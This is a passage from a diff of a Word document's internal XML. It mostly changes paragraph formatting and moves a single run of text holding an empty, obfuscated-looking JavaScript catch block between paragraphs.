+          <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+          <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">} catch (_0x5584ac) {}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -970,12 +961,29 @@
         <w:jc w:val="left"/>
         <w:rPr/>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">} catch (_0x5584ac) {}</w:t>
-      </w:r>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext w:val="false"/>
+        <w:keepLines w:val="false"/>
+        <w:pageBreakBefore w:val="false"/>
+        <w:widowControl w:val="false"/>
+        <w:pBdr>
+          <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+          <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
       <w:r/>
     </w:p>
     <w:sectPr>

</xml_diff>